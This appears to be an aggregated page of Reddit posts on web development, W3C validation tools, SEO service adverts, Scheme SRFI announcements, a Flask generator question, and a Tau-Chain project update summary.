W3C validation

W3C Compatibility Test (W3C Validation) » Web Vimi

2020.11.22 08:34 WebVimi W3C Compatibility Test (W3C Validation) » Web Vimi

W3C Compatibility Test (W3C Validation) » Web Vimi submitted by WebVimi to u/WebVimi [link] [comments]

2020.11.13 16:52 QArea_ltd 26 Basic Tools for Testing Your Website

Have you ever wanted to buy goods or services on a website that takes several seconds to load, or where you have to guess which button to tap? If things are complicated and website performance is poor, people will go elsewhere to meet their needs. Whether you are only planning to launch your site or want to improve the current one, use these basic testing tools to find out what's going wrong and what you should fix right away.

Tools for performance testing

Online website-testing services may be all you need – they will show you page-load speed, how people see your site from different locations, and so on. The more of these tools you try, the more you will find to improve.

Here are the top eleven tools for performance testing:

  1. Google PageSpeed Insights – a site-performance report from Google, for both mobile and desktop devices.
  2. WebPageTest – detects the causes of slow site loading.
  3. GTmetrix – checks the overall performance of the site.
  4. Pingdom – a monitoring service and free automated website-testing tool.
  5. Gomez – viewing from multiple locations, with over 100 locations to choose from.
  6. Alertra – uptime checks from several locations.
  7. Load Impact – load testing from several locations, with performance reports.
  8. FeedTheBot – tests for website optimization and performance.
  9. Dotcom-Monitor – site performance tests from 20 locations with just one click.
  10. REDbot – a small utility for checking HTTP headers.
  11. Neustar UltraTools – a set of utilities for checking hosting speed, DNS, and more.
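At their core, these services repeatedly fetch a page and report load-time statistics across checks and locations. A minimal sketch of that reporting step in Python (the function name and the sample timings are illustrative, not any particular tool's API):

```python
# Summarize repeated page-load timings (in milliseconds) the way
# monitoring tools report them: minimum, median, and maximum.

def load_time_stats(samples_ms):
    """Return min/median/max of a list of page-load timings."""
    if not samples_ms:
        raise ValueError("need at least one sample")
    ordered = sorted(samples_ms)
    n = len(ordered)
    mid = n // 2
    # median: middle element, or mean of the two middle elements
    median = ordered[mid] if n % 2 else (ordered[mid - 1] + ordered[mid]) / 2
    return {"min": ordered[0], "median": median, "max": ordered[-1]}

print(load_time_stats([420, 350, 980, 510, 390]))
```

The real tools add the fetching (from many geographic locations) on top of exactly this kind of summary.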

Mobile-friendly testing tools

If you already have a mobile-friendly site, or you plan to get one, these basic website QA testing tools will definitely help you. Today I decided to collect the best tools for testing sites on mobile operating systems such as iOS and Android, without the need to use physical devices. These tools will help you test the functionality and adaptability of your sites on various mobile platforms.
Below is a small selection of mobile emulators, as well as other tools for testing and validation on various mobile platforms. These tools will help you identify the problem areas of your website and take appropriate action.

Mobile emulators

  1. Mobile emulator – for viewing site pages on mobile screens.
  2. Responsive Design Test – for site checking on mobile devices.
  3. Responsive test – a tool for checking the display of the site at various screen resolutions.
  4. Emulator – to see the way your site is displayed on the iPhone.
  5. Responsivepx – for testing site responsiveness.
  6. Responsive Test – cross-site browser testing tool.
  7. Viewing a site on an iPad – a mobile iPad emulator.

Additional browser emulators

  1. Opera Mini Emulator – to view pages in this browser.
  2. Responsive Design Tool – for seeing the site design.
  3. Resize My Browser – for testing different browser window sizes.

Browser plugins

  1. Modify Headers (Firefox) – for viewing mobile pages.
  2. Responsive Web Design Tester (Chrome) – for checking mobile pages.
  3. Responsive View (Chrome) – for seeing mobile sites.

Tools for validation

  1. W3C mobileOK Checker – for mobile site validity.
  2. MobiReady – for validation purposes.
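Validators like these return a machine-readable report; the W3C Nu HTML Checker, for instance, can emit JSON with a messages array. A hedged sketch of tallying such a report in Python (the report shape follows the Nu checker's documented JSON output; the sample data is made up):

```python
# Tally errors and other messages in a validator report shaped like the
# W3C Nu HTML Checker's JSON output: {"messages": [{"type": ...}, ...]}.

def tally_messages(report):
    counts = {"error": 0, "info": 0}
    for msg in report.get("messages", []):
        kind = msg.get("type", "info")
        counts[kind] = counts.get(kind, 0) + 1
    return counts

sample = {
    "messages": [
        {"type": "error", "message": "Stray end tag div."},
        {"type": "info", "subType": "warning", "message": "Consider adding lang."},
        {"type": "error", "message": "Duplicate ID nav."},
    ]
}
print(tally_messages(sample))  # {'error': 2, 'info': 1}
```

A zero error count is the machine-readable version of a "document is valid" result.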


Testing takes time and effort. However, it will make you feel sure that everything works fine and that site visitors will be fully satisfied with their experience. The variety of tools is huge, so it may be hard to check every detail of the site.
Another way of validating high performance and compatibility with mobile devices is hiring a website testing company instead of spending so much time on completing this task yourself. In this case, you will have a person or a team that has professional tools for testing every feature of the site – it’s a good choice if you need high-quality testing processes and predictable results.
submitted by QArea_ltd to Development [link] [comments]

2020.11.09 09:09 itboulevard Web Development Company in Mohali

Web Development Company in Mohali
Being a reliable web development company in Mohali, we can provide you with competent front-end development solutions. Our team of experienced and skilled developers turns innovative graphic designs into clean, W3C-validated markup for the best development solutions for our clients.
submitted by itboulevard to u/itboulevard [link] [comments]

2020.10.29 20:56 arthurgleckler Final SRFI 207: String-notated bytevectors

Scheme Request for Implementation 207, "String-notated bytevectors," Daphne Preston-Kendal (external notation), John Cowan (procedure design), and Wolfgang Corcoran-Mathe (implementation), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-207/.
Here's the abstract:
To ease the human reading and writing of Scheme code involving binary data that for mnemonic reasons corresponds as a whole or in part to ASCII-coded text, a notation for bytevectors is defined which allows printable ASCII characters to be used literally without being converted to their corresponding integer forms. In addition, this SRFI provides a set of procedures known as the bytestring library for constructing a bytevector from a sequence of integers, characters, strings, and/or bytevectors, and for manipulating bytevectors as if they were strings as far as possible.
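The bytestring constructor the abstract describes – building a bytevector from a mix of integers, characters, and strings – can be loosely approximated in Python, with bytes playing the role of bytevectors (a rough analogy for illustration, not the SRFI 207 API itself):

```python
# Build a byte string from a mix of ints (raw byte values), ASCII strings
# (stored literally, as the SRFI's notation allows), and bytes objects.

def bytestring(*parts):
    out = bytearray()
    for part in parts:
        if isinstance(part, int):                 # raw byte value 0..255
            out.append(part)
        elif isinstance(part, (bytes, bytearray)):
            out.extend(part)
        elif isinstance(part, str):               # printable ASCII text
            out.extend(part.encode("ascii"))
        else:
            raise TypeError(f"unsupported part: {part!r}")
    return bytes(out)

print(bytestring("GET ", 0x2F, "index.html", b"\r\n"))
```

This mirrors the SRFI's motivation: binary data that is partly ASCII text can be written with the text parts literal instead of as integer codes.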
Here is the commit summary since the most recent draft:
Here are the diffs since the most recent draft:
Many thanks to Daphne, John, and Wolfgang, and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.10.28 02:00 loraxx753 Raise your hand if you've done

so you could figure out what closed what. 🙋‍♂️

Have you ever run into this issue:
Adding is kind of a hacky fix, isn't it?
Wouldn't it be nice for that html to look like this instead:
Then do it. As long as you have a dash in the element's name, you can name it whatever you want. Use it anywhere you can use a regular
Like the CSS
the-page { background: blue; }
the-page > the-wrapper { color: red; }
or Javascript
const link_wrapper = document.querySelector('link-wrapper');
link_wrapper.addEventListener('click', function() {});
submitted by loraxx753 to learnjavascript [link] [comments]

2020.10.20 08:22 milkywayservice Website Development Company Noida To Make Virtual Dream Come True

Website Development Company Noida To Make Virtual Dream Come True
There are many leading web development companies that specialize in effective virtual branding according to W3C standards. They have been providing the best web development services and serving their clients. They also offer the most satisfactory results for your digital needs and help your business grow. The best Website Development Company Noida has a dedicated team of professional designers and developers who create powerful and beautiful websites. They use an extremely clean and bold design style to provide standards-based markup code for your websites that scores well on Google and helps increase conversions. Web Development Companies in India believe that a good online presence starts with a great website and experience.

Basic Services provided by Website Development Company Noida

Web development experts use the latest technologies and platforms like WordPress, Joomla, Drupal, and more to achieve your business goals. Some common Web development services provided by Website Development Company Noida are given below:
1) Dedicated web application
A generic, out-of-the-box web solution may not meet specific business needs. In this case, custom web development is essential to obtain the best results. They help you create a custom web application for your specific business needs. They design contextual UI/UX for better usability, choose the appropriate architecture for the best performance, and write custom code to incorporate your complex and unique business logic into your web application.
2) E-commerce development
E-commerce development offers you much more than a trading platform. They focus on developing solutions that increase customer engagement and loyalty to your retail business. From visual experiments to personalized suggestions, chat marketing, push notifications, and an admin dashboard, it has all the latest features your e-commerce retail business needs.

Web Design Process Followed By Website Development Company Noida

1) Understand the customer's vision:
First of all, they listen carefully and fully to customer needs, make sure your questions are answered in the best way, and guide you in the right direction.
2) Planning And Understanding Requirements:
They create a plan to keep your website development process manageable and organized. They understand the importance of reaching goals and providing a great experience for end-users.
3) Design And Development:
Once a platform is designed, they send the design to the client for review and comment. They look for innovative details until you are satisfied with their work. The approved design is then coded and developed.
4) Testing Phase:
They run the website on multiple devices and use advanced tools to ensure that it is responsive, easy to use, and error-free according to W3C validation. When problems occur, they make the necessary changes to carry out quality projects.
5) Implementation Phase:
After making sure that your website is error-free, they offer it to the market by hosting it on your server that is open to you, your employees, and users. The Website Development Company Noida also provides maintenance and support if you encounter performance issues.
submitted by milkywayservice to u/milkywayservice [link] [comments]

2020.10.19 08:31 TroyBarone Faded - Responsive App Landing Page WordPress Theme + RTL

Faded - Responsive App Landing Page WordPress Theme + RTL
FADED is a modern App Landing Page WordPress Theme – beautifully crafted for use with any related product in the industry, such as mobile apps, SaaS applications, software, digital products, even books or magazines.

  1. Clean, Modern & Beautiful Design
  2. Fully Responsive Bootstrap Based (3.x)
  3. WPML – Multi-lingual support integrated
  4. RTL – ‘Right To Left’ supported
  5. Yoast SEO integrated
  6. Working Contact Form
  7. MailChimp Integrated
  8. Blog, Blog Single Post Included
  9. Google Fonts Used
  10. Font Awesome (630+), Ionicons (730+) & Linearicons (1000+) icons
  11. Very Smooth Transition Effects
  12. Super Easy To Customize
  13. Well Commented Code
  14. W3C Valid Code
  15. Very Good Documentation
  16. Top Notch Support
submitted by TroyBarone to WordPressThemes [link] [comments]

2020.10.11 17:44 reliableseoservices RELIABLE SEO SERVICES



Technical SEO & Digital Marketer. Data Driven & ROI Focused Marketing.

I provide Search Engine Optimization (SEO), Social Media Optimization (SMO), Pay Per Click (PPC), and Email Marketing freelance digital marketing services, with 9+ years of experience. WhatsApp: 91-8955519549, Skype ID: reliableseoservicess

Experienced (9+ years) Search Engine Optimization Executive with a demonstrated history of working in the information technology and services industry. Skilled in Search Engine Optimization (SEO), Keyword Research, Social Media Optimization (SMO), etc. We understand how Google views websites and what makes some sites rank better than others for certain search words. Our work involves improving the 'trust' value of a website so that it starts to climb up the rankings until the website appears on page one or even in the top position on Google. The techniques we use fully comply with Google's terms and conditions.

• Established & Proven SEO Strategies.
• 100% Ethical, White Hat Practices.
• Fully Managed SEO Services.
• Quality of Work.
• Systematic social media optimization.
• Strong & talented skills.
• Strong and dynamic social media page promotion.

Our SEO Skills are listed below:-

• On-page Optimization:
(Technical implementations)

• Structural & Analytical Analysis
• Search Worthy Keyword Research
• Appropriate Tagging - Titles, Meta Descriptions, Meta Keywords, Heading Tags, Alt Tags etc.
• URL Optimization
• Anchor Text Linking in Content
• Sitemaps & Feed - HTML, XML, RSS
• Robots File Setup
• Google Search Console Setup
• Google Analytics Setup
• Canonical Tags
• 301 Redirects
• Duplicate Content Fixing
• W3C Validation
• Fixing Broken Links, HTML Validation Errors, etc.
• Schema Implementation
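The tagging checks in the list above boil down to parsing a page and flagging missing elements. A small illustrative sketch using Python's standard html.parser (the two rules shown are a simplified slice of a real on-page audit):

```python
# Flag a missing <title> and a missing meta description - a tiny slice
# of what on-page SEO audit tools check.
from html.parser import HTMLParser

class OnPageAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.has_title = False
        self.has_meta_description = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "title":
            self.has_title = True
        if tag == "meta" and attrs.get("name", "").lower() == "description":
            self.has_meta_description = True

def audit(html):
    parser = OnPageAudit()
    parser.feed(html)
    issues = []
    if not parser.has_title:
        issues.append("missing <title>")
    if not parser.has_meta_description:
        issues.append("missing meta description")
    return issues

print(audit("<html><head><title>Hi</title></head><body></body></html>"))
```

The same pattern extends to heading tags, alt attributes, canonical tags, and the other items above.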

• Off-page Optimization:
(Backlink creation through top online resources to divert traffic to the website.)

• Business Directory Submission / Profile Linking
• Social Bookmarking
• Article Submission
• Classified Ads Submission
• Blog Posting
• Blog Commenting
• Business Profile Listing / Citation
• Web 2.0 Blog Submission
• Search Engine Places Listing
• Document Sharing in form of PDFs, Videos, Slide Show etc.
• Search Engine Submission
• Image Sharing
• Q & A Sites submission like Quora, Yahoo Answers etc.
submitted by reliableseoservices to u/reliableseoservices [link] [comments]

2020.10.03 06:17 wic2011 RSS feed issue with IFTTT

Hi guys, I am trying to create an applet to link my website's RSS feed to Facebook, but IFTTT says the RSS feed is invalid even though the feed is valid – I have confirmed this with the W3C Feed Validation Service. Is there anything I can do?
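(As a quick local sanity check before blaming the service: the channel elements RSS 2.0 requires – title, link, description – can be verified with Python's standard library. A rough check, not a substitute for the W3C validator:)

```python
# Check that an RSS 2.0 feed's <channel> has its required children:
# title, link, and description.
import xml.etree.ElementTree as ET

def missing_channel_elements(feed_xml):
    root = ET.fromstring(feed_xml)
    channel = root.find("channel")
    if channel is None:
        return ["channel"]
    required = ("title", "link", "description")
    return [name for name in required if channel.find(name) is None]

feed = """<rss version="2.0"><channel>
  <title>My Site</title>
  <link>https://example.com/</link>
</channel></rss>"""
print(missing_channel_elements(feed))  # ['description']
```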
submitted by wic2011 to ifttt [link] [comments]

2020.09.29 10:27 parvanweb Website design: a download-site template for WordPress

Continuing the series of portfolio items from the Parvan Web design group: the download site of the Morche software group, built completely custom and from the ground up by Parvan Web, and without doubt one of the best templates designed for a download site. The website graphics were designed first and approved by the respected client; the graphic design was then implemented in fully valid, responsive HTML5/CSS3 using the world's best framework, Bootstrap version 4; finally, WordPress was set up with complete theme-management settings for easy administration of the Morche software group's WordPress download site.

Features of the designed download template and site:

Technologies used in designing the Morche software group's website:

View the Morche download-site design
submitted by parvanweb to u/parvanweb [link] [comments]

2020.09.22 12:05 itcrowd21 How to use yield instead if return?

I'm writing a WhatsApp chat bot using Flask adapting the tutorial here and the following code snippet works when I'm testing locally and using print (the 'bot' successfully returns some results from Airtable in response to a WhatsApp message):
def pretty(d):
    return f'''Date: {d['Date']!r}
Title: {d['Title']!r}
Description: {d['Description']!r}
'''

pages = airtable.get_iter(maxRecords=3, formula="Date >= NOW()",
                          sort=["Date"], fields=('Date', 'Title', 'Description'))
for page in pages:
    for record in page:
        if 'fields' not in record:
            continue
        fields = record['fields']
        print(pretty(fields))
The above is good and works when I run it locally. I got some help from this subreddit for the def pretty(d) function - major props to my helper.
However, I run into problems when I deploy to Heroku - the return here causes the loop to break and I only get one result (I want 3 results or n results as requested):
if 'next' in incoming_msg:
    def pretty(d):
        return f'''Date: {d['Date']!r}
Title: {d['Title']!r}
Description: {d['Description']!r}
'''
    pages = airtable.get_iter(maxRecords=3, formula="Date >= NOW()",
                              sort=["Date"], fields=('Date', 'Title', 'Description'))
    for page in pages:
        for record in page:
            if 'fields' not in record:
                continue
            fields = record['fields']
            return pretty(fields)
So I try using yield instead of return:
if 'next' in incoming_msg:
    def pretty(d):
        return f'''Date: {d['Date']!r}
Title: {d['Title']!r}
Description: {d['Description']!r}
'''
    pages = airtable.get_iter(maxRecords=3, formula="Date >= NOW()",
                              sort=["Date"], fields=('Date', 'Title', 'Description'))
    for page in pages:
        for record in page:
            if 'fields' not in record:
                continue
            fields = record['fields']
            yield pretty(fields)
But I get this error:
TypeError: The view function did not return a valid response. The return type must be a string, dict, tuple, Response instance, or WSGI callable, but it was a generator. 
Perhaps I have the syntax wrong but the following just crashes and burns:
for page in pages:
    for record in page:
        if 'fields' not in record:
            continue
        fields = record['fields']
        yield pretty(fields)
When I call the above code with a webhook, it fails in a major way:
500 Internal Server Error

The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
So, how do I return the results of a nested loop using yield instead of return in this case?
Many thanks in advance.
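(One way around the error, though not necessarily the poster's final solution: keep return, but collect every formatted record into a single string first, since a plain Flask view must return a complete response body rather than a bare generator. A sketch with the Airtable call replaced by sample data:)

```python
# Collect every formatted record into one string and return that, instead
# of returning or yielding inside the loop. The pages variable below
# stands in for airtable.get_iter(...).

def pretty(d):
    return f"Date: {d['Date']!r}\nTitle: {d['Title']!r}\nDescription: {d['Description']!r}\n"

def format_all(pages):
    chunks = []
    for page in pages:
        for record in page:
            if 'fields' not in record:
                continue
            chunks.append(pretty(record['fields']))
    return "\n".join(chunks)   # one string: a valid Flask response body

pages = [[{'fields': {'Date': 'Mon', 'Title': 'A', 'Description': 'x'}},
          {'id': 'rec2'}],
         [{'fields': {'Date': 'Tue', 'Title': 'B', 'Description': 'y'}}]]
print(format_all(pages))
```

In the actual view function you would `return format_all(pages)`; yielding only works if the generator is wrapped in a streaming Response.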
submitted by itcrowd21 to learnpython [link] [comments]

2020.09.18 06:13 arthurgleckler Final SRFI 196: Range Objects

Scheme Request for Implementation 196, "Range Objects," by John Cowan (text) and Wolfgang Corcoran-Mathe (implementation), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-196/.
Here's the abstract:
Ranges are collections somewhat similar to vectors, except that they are immutable and have algorithmic representations instead of the uniform per-element data structure of vectors. The storage required is usually less than the size of the same collection stored in a vector and the time needed to reference a particular element is typically less for a range than for the same collection stored in a list. This SRFI defines a large subset of the sequence operations defined on lists, vectors, strings, and other collections. If necessary, a range can be converted to a list, vector, or string of its elements or a generator that will lazily produce each element in the range.
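The idea of an algorithmic representation – storing a length plus an indexer function instead of per-element storage – can be illustrated in Python (the class and method names are ours, not the SRFI's):

```python
# A range stores only a length and a function from index to element, so
# no per-element storage is needed; elements are computed on demand.

class Range:
    def __init__(self, length, indexer):
        self.length = length
        self.indexer = indexer

    def __len__(self):
        return self.length

    def __getitem__(self, i):
        if not 0 <= i < self.length:
            raise IndexError(i)
        return self.indexer(i)

    def to_list(self):          # conversion, as the abstract describes
        return [self.indexer(i) for i in range(self.length)]

squares = Range(5, lambda i: i * i)
print(len(squares), squares[3], squares.to_list())
```

The storage cost is constant regardless of length, which is the space saving the abstract points to.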
Here is the commit summary since the most recent draft:
Here are the diffs since the most recent draft:
Many thanks to John and Wolfgang and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.09.03 21:28 monopolyinvestments Livio Review, Bonus, Demo Video From Art Flair



Livio Review, Bonus, Demo Video From Art Flair


Art Flair’s Livio, Mega Bonuses link
Livio – Automatically, With Just 1 Click, Identifies All The Mistakes & Problems Of Any Website That Prevent It From Ranking #1 In The Google Search Engine
Livio Helps Anyone Generate Traffic, Leads & Sales
This is one of the most powerful systems: automatically, with just 1 click, it identifies all the mistakes and problems of your website that prevent it from ranking #1 in the Google search engine!
Not only the mistakes – it also gives you an easy-to-understand PDF report which you can save for future and offline use. You can easily compare your site with competitors' sites and find out where you are lacking – the exact points on which your opponent is strong!
Along with it, it also comes with a 100% white-label PDF reporting system where you can just plug in your logo, company etc. and send it to your clients. These are the metrics that will be measured:

  1. Meta Title
  2. Meta Description
  3. Meta Keywords
  4. Headings
  5. Google Preview
  6. Missing Image Alt Attribute
  7. Keywords Cloud
  8. Keyword Consistency
  9. Text/HTML Ratio
  10. GZIP Compression Test
  11. WWW / NON-WWW Resolve
  12. IP Canonicalization
  13. XML Sitemap
  14. Robots.txt
  15. URL Rewrite
  16. Underscores in the URLs
  17. Embedded Objects
  18. Iframe Check
  19. Domain Registration
  20. WHOIS Data
  21. Indexed Pages Count (Google)
  22. Backlinks Counter
  23. URL Count
  24. Favicon Test
  25. Custom 404 Page Test
  26. Page Size
  27. Website Load Time
  28. PageSpeed Insights (Desktop)
  29. Language Check
  30. Domain Availability
  31. Typo Availability
  32. Email Privacy
  33. Safe Browsing
  34. Mobile Friendliness
  35. Mobile Preview Screenshot
  36. Mobile Compatibility
  37. PageSpeed Insights (Mobile)
  38. Server IP
  39. Server Location
  40. Hosting Service Provider
  41. Speed Tips
  42. Analytics
  43. W3C Validity
  44. Doc Type
  45. Encoding
  46. Facebook Likes Count
  47. PlusOne Count
  48. StumbleUpon Count
  49. LinkedIn Count
  50. Estimated Worth
  51. Alexa Global Rank
  52. Visitors Localization
  53. In-Page Links
  54. Broken Links

Livio Upgrade Offers (OTOs)

Upgrade #1: Livio Done For You 100% Done For You Pack to get you started in next 05 min. This includes our TESTED & PROVEN work. ​DFY Evergreen Affiliate Campaigns ​DFY AUTOMATED Campaigns ​DFY CPA Campaigns ​DFY Social Media Promos ​DFY Email Campaigns ​DFY Engagement Posts ​DFY Squeeze Pages ​DFY Stock Music ​DFY Images
Upgrade #2: Livio Case Studies Livio Case Studies: copy-paste from 08 of our real-life case studies (each one made us thousands of dollars). It's 100% done for you – all you have to do is copy-paste these into your accounts and you can start seeing results almost instantly! We will show you exactly how to scale your online income up, from $100 a day to $200, $300 or even $500 per day with our unique advanced training & strategies!
Upgrade #3: 6x Reseller Sell Livio & 05 High Converting Funnels as your own product and keep 100% Profits for yourself. ​Make Up To $498 Per Sale ​Resellers License To Traffic Turbine ​Resellers License To 5 Additional Funnels ​All Promo Material
Upgrade #4: Livio 6-Fig Training Livio Super Affiliate/Vendor Training: Want To Become A Super Affiliate? Leverage these traffic & product training to build yourself a 6-fig business this year. It includes: ​Instagram Traffic Module ​Google Adwords Module ​Product Creation Module
Upgrade #5: 03 Traffic Softwares Livio 03 Traffic Softwares – Snatch 3 Additional Traffic Software For The Price of one! Rapid Lead Magnets ​Keyword Research Ninja ​Twitter Marketing Bot
Upgrade #6: 45 WSOTD Livio 45 WSOTD Products – Get your hands on every single product TEAM BLACK BELT released since 2015 that got a Warrior+ DOTD Award or the JVZoo POTD Award! This includes multiple traffic formulas, sales making strategies and even software!
Art Flair’s Livio, Mega Bonuses link
submitted by monopolyinvestments to u/monopolyinvestments [link] [comments]

2020.09.02 13:38 m4nki Summary of Tau-Chain Monthly Video Update - August 2020

Transcript of the Tau-Chain & Agoras Monthly Video Update – August 2020
Major event of this past month: release of the whitepaper. He encourages everyone to read the whitepaper because it's going to guide our development efforts for the foreseeable future. Development is proceeding well on two major fronts:

  1. Agoras Live website: features are being added to it; only two major features are missing.
  2. TML: We identified ten major tasks to be completed before the next release. Three of them are optimization features which are very important for the speed and performance of TML.

In terms of time requirements, we feel good about staying on schedule for the end of this year. We are also bringing in two extra resources to help us get there as soon as possible.
Been working on changes in the string relation, especially moving from binary string representation to unistring. The idea is that now rather than having two arguments in the term, you would have a single argument for the string. Thus, the hierarchy changes from two to one and that has an effect on speed and on the storage. So the first few numbers that we calculated showed that we are around 10% faster than with the binary string. There are some other changes that need to be made with regards to the string which he is working on.
Had to revise how we encode characters in order to be compatible with the internet. It also was the last missing piece in order to compute persistence. The reason is that the stored data has to be portable and if TML needs characters and strings internally in the same encoding as it stores its own data, we can map strings directly into files and gain lots of speed with it. The code is now pushed in the repository and can be tested. He’s also working on a TML tutorial and likely before next update, there should be something available online.
Transcribed past month's video update. You can find it on Reddit. Also, he has done more outreach towards potential partner universities and research groups, and this month the response rate was better than earlier, most likely because of the whitepaper release. Positive replies include: the University of Mannheim; Trier (Computational Linguistics & Digital Humanities); and the research group AI KR from within the W3C (https://www.w3.org/community/aik), which articulated strong interest in getting a discussion going, particularly because they had some misconceptions about blockchain. They would like to have a Q&A session with a couple of their group members, but first it's important for us to have them read the whitepaper to get a basic understanding and then be able to ask respective questions. Other interested parties include the Computational Linguistics research group of the University of Groningen, Netherlands, and the Center for Language Technology of the University of Gothenburg, Sweden. We also got connected to the Chalmers University of Technology, Sweden.
He has also done some press outreach in combination with the whitepaper release, trying to get media outlets to cover our project, but so far hasn't received feedback. He has been discussing the social media strategy with Ohad and Fola, trying to be more active on our channels and keep a weekly posting schedule on Twitter, including non-technical and technical contests that engage all parts of our community. Furthermore, he has opened up a discussion on Discord (https://discord.gg/qZtJs78) in the "Tau-Discussion" channel around the topics that Ohad mentioned he would first like to see discussed on Tau (see https://youtu.be/O4SFxq_3ask?t=2225):
  1. Definitions of what good and bad means and what better and worse means.
  2. The governance model over Tau.
  3. The specification of Tau itself and how to make it grow and evolve even more to suit wider audiences. The whole point of Tau is people collaborating in order to define Tau itself and to improve it over time, so it will improve up to infinity. This is the main thing, especially initially, that the Tau developers (or rather users) advance the platform more and more.
If you are interested in participating in the discussion, join our Discord (https://discord.gg/qZtJs78) and post your thoughts – we'd appreciate it!
He has also finished designing the bounty-claiming process, so people who worked on a bounty can now claim their reward by filling out the bounty claiming form (https://forms.gle/HvksdaavuJbu4PCV8). He has also been working on revamping the original post in the Bitcointalk thread: it contains a lot of broken links and is generally outdated, so he's using the whitepaper to give it a complete overhaul. With the whitepaper release, the community also got a lot more active, which was great to see, and thus he dedicated more time towards supporting the community.
Finished multiple milestones with regards to the Agoras Live website:

  1. Question section, where people post their requests and knowledge providers can help them with missing knowledge.
  2. Have been through multiple iterations of how to approach the services on the website and how the service seeker can discover new people through it.
  3. Extended the limited, static categories on the website to add more diversity to it. By adding tags, it will be easier for service seekers to find what they are looking for.
  4. Onboarding: added an onboarding step where the user chooses categories of his interest, and as a result he will find the homepage more personalized towards him and his interests.
  5. New section added to the user profile: the services that the knowledge provider can provide, added as tags or free text.
  6. Search: can filter via free text and by country, language, etc.
  7. Been working on how to display the knowledge providers on the platform.
Improved look of the Agoras Live front page: Looks more clean. Finetuned search options. Redesigned the header. It now has notification icons. If you query a knowledge provider for an appointment, he will receive a notification about the new appointment to be approved or rejected. You can also add a user to your favorites. Front page now randomly displays users. Also implemented email templates, e.g. a thank you email upon registration or an appointment reminder. What is left to do is the session list and then the basic engine will be ready. Also needs to implement the “questions” section.
Has switched towards development of TML related features. Been working mainly on the first order logic support. Has integrated the formula parser with the TML core functionality. With this being connected, we added to TML quantified Boolean function solving capability in the same way as we get the first order logic support. It’s worth mentioning that this feature is being supported by means of the main optimized BDD primitives that we already have in the TML engine. Looking forward to make this scalable in terms of formula sizes. It’s a matter of refining the Boolean solution and doing proper tests to show this milestone to the community in a proper way.
Have been discussing the feasibility of a token swap towards ERC20 from the Omni token with exchanges and internally with the team. Also has been discussing the social media strategy with Kilian. As we update with the new visual identity and the branding, it’s a good time to boost our social media channels and look ready for the next iteration of our look and feel. Continuing on the aspects of our visual identity and design, he’s been talking to quite a number of large agencies who have been involved in some of the larger projects in the software space. One being Phantom (https://phantom.land) who designed the DeepMind website (https://deepmind.com), the other one being Outcast (https://theoutcastagency.com) who have been working with Intel and SalesForce. We aren’t sure yet with which company we go but it’s been good to get insight into how they work and which steps they’d take into getting our project out to the wider audience. That whole process has been a lot of research into what kind of agencies we’d want to get involved with. Also, with the release of the whitepaper being such a big milestone in the history of the company, he’s been doing a lot of reading of that paper. We’re also looking to get more manpower involved with the TML website. Also going to hire a frontend developer for the website and the backend will be done according to Ohad’s requirements. Also, as a response of the community’s feedback towards the Omni deck not being user friendly, he did some outreach to the Omni team and introduced them to a partner exchange for Agoras Live. They have an “exchange-in-a-box” service which may help Omni to have a much more usable interface for the Omni Dex, so hopefully they will be working together to improve the usability of the Omni Dex.
Finished writing the community draft of the whitepaper. The final version will contain changes according to the community's feedback and more elaboration on topics that weren't included in the current paper, including logics for law and the full process of Tau. And, as usual, he has been doing more research on second-order logic – specifically, Boolean options – and analyzing the situation where the formulas are in conjunctive normal form, trying to extract information from such a CNF. Also, regarding what Juan mentioned about first-order logic: people who are already familiar with TML will see that with this change, using TML has become much easier. With first-order formulas, expressing yourself has become much simpler than before.
Q: What is the difference between Horn Second Order Logic and Krom Second Order Logic?
A: Horn and Krom are special cases of CNF (conjunctive normal form). Conjunctive normal form means the formula is a conjunction of clauses (this clause and this clause and so on), where each clause is a disjunction of atoms: it’s this or this or that. Any formula can be brought to this form. Krom is the case where each clause contains exactly two atoms, and Horn is the case where at most one atom in every clause is positive, with the rest negated. That’s the definition.
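These definitions are easy to check mechanically. A small sketch (plain Python, not TML; the DIMACS-style clause encoding, where a negative integer marks a negated atom, is our own convention, not anything from the whitepaper):

```python
def is_krom(cnf):
    """Krom: every clause has exactly two literals (2-CNF)."""
    return all(len(clause) == 2 for clause in cnf)

def is_horn(cnf):
    """Horn: every clause has at most one positive (non-negated) literal."""
    return all(sum(1 for lit in clause if lit > 0) <= 1 for clause in cnf)

# (x1 or not x2) and (not x1 or not x3): both Krom and Horn
f = [[1, -2], [-1, -3]]
print(is_krom(f), is_horn(f))  # -> True True
```

A clause like `[1, 2]` (two positive atoms) would still be Krom but not Horn.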
Q: Now that the whitepaper has been released, how do you think it will affect the work of the developers?
A: We see the whitepaper as being a roadmap of development for us, so it will essentially be the vision that we are working to implement. Of course, we have to turn it into much more specific tasks, but as you saw from the detailed progress from last month, that’s exactly what we do.
Q: When can we expect the new website?
A: We’ve just updated the website with the whitepaper and the new website should be launching after we get the branding done. There’s a lot of work to be done and a lot of considerations taking place. We have to get the graphics ready and the front end done. The branding is the most important step we have to get done and once that is complete, we will launch the new website.
Q: What needs to be resolved next before we get onto a solid US exchange?
A: With the whitepaper released, that’s probably been the biggest hurdle we had to get over. At this point, we still have to confirm some elements of the plan with the US regulators and we do need to have some sort of product available. Be that the TML release or Agoras Live, there needs to be something out for people to use. So, in conjunction with the whitepaper and approval from the US regulators, we need to have a product available to get onto US exchanges.
Q: Does the team still need to get bigger to reach cruising speed, if so, how much by and in which areas?
A: Of course, any development team would like to have as many resources as possible, but even with the resources that we have right now, we are making significant progress towards our two development goals, the Agoras Live website and the TML engine. We are bringing in at least two more people in the near future; there is no lack of work to be done, and no lack of progress either.
Q: Will Prof. Carmi continue to work in the team and if so, in what capacity?
A: Sure, Prof. Carmi will continue coordinating with us. Right now, he’s working on the mathematics of certain features in the derivatives market that Agoras is planned to have, and also ongoing research in relevant logic.
Q: Will you translate the whitepaper into other languages?
A: Yes, we expect the whitepaper to be translated into the most prominent languages in our community, e.g. Chinese. Exactly which languages, we cannot say right now.
Q: Is the roadmap on the website still correct and, when will we move to the next step?
